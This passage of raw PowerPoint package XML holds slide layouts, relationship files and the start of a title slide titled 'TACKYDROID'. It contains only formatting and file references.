            <a:ext cy="1600199" cx="6784847"/>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7" name="Shape 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="457200" x="3710866"/>
            <a:ext cy="4114799" cx="4594934"/>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8" name="Shape 68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="457200" x="762000"/>
            <a:ext cy="4114800" cx="2673657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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0" name="Shape 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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1" name="Shape 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="2514599" x="1677193"/>
            <a:ext cy="1587" cx="3809999"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:solidFill>
              <a:srgbClr val="979797"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="med" len="med" type="none"/>
            <a:tailEnd w="med" len="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3" name="Shape 73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="758952"/>
            <a:ext cy="1600199" cx="6784847"/>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5" name="Shape 75"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="457200" x="777239"/>
            <a:ext cy="2895600" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="med" len="med" type="none"/>
            <a:tailEnd w="med" len="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3505200" x="850391"/>
            <a:ext cy="804861" cx="7391399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Shape 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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8" name="Shape 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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9" name="Shape 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId12"/><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10.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId10"/><Relationship Target="../slideLayouts/slideLayout4.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId4"/><Relationship Target="../slideLayouts/slideLayout11.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId11"/><Relationship Target="../slideLayouts/slideLayout3.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId3"/><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noFill/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="8" name="Shape 8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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0" name="Shape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="3886200" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" marR="0" indent="-137159" marL="594360">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0" marR="0" indent="-106680" marL="868680">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" marR="0" indent="-114300" marL="1143000">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" marR="0" indent="-114300" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr algn="l" rtl="0" marR="0" indent="-134620" marL="1645920">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr algn="l" rtl="0" marR="0" indent="-136651" marL="1901951">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr algn="l" rtl="0" marR="0" indent="-137160" marL="2194560">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr algn="l" rtl="0" marR="0" indent="-132079" marL="2468880">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="6248400"/>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 name="Shape 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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3" name="Shape 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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4" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="0" x="777239"/>
            <a:ext cy="381000" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6172200" x="777239"/>
            <a:ext cy="27431" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>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8.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8.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4"/><Relationship Target="../media/image08.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21.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13.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11.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 Target="../media/image18.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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image14.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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image15.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image23.pn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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image10.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3"/></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4"/><Relationship Target="../media/image22.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image17.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image20.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image25.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image31.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image24.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image32.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image28.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image33.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide56.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide57.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide58.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide59.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60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide60.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image34.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide61.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide62.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide63.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image29.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide64.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image26.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide65.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image30.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide66.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../media/image27.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2.gif"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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3200400" x="762000"/>
            <a:ext cy="1524000" cx="7543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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="8000" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>TACKYDROID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4724400" x="762000"/>
            <a:ext cy="990599" cx="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
